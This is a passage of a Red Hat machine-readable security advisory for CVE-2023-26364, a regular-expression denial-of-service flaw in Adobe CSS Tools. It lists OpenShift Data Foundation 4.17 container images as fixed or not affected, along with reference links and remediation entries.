"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2250364"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Adobe CSS Tools. An improper input validation could result in a minor denial of service while parsing a malicious CSS with the parse component. User interaction and privileges are not required to jeopardize an environment.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "css-tools: Improper Input Validation causes Denial of Service via Regular Expression",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-26364"
},
{
"category": "external",
"summary": "RHBZ#2250364",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2250364"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-26364",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26364"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-26364",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26364"
},
{
"category": "external",
"summary": "https://github.com/adobe/css-tools/security/advisories/GHSA-hpx4-r86g-5jrg",
"url": "https://github.com/adobe/css-tools/security/advisories/GHSA-hpx4-r86g-5jrg"
}
],
"release_date": "2023-11-17T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "No mitigation is yet available for this vulnerability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
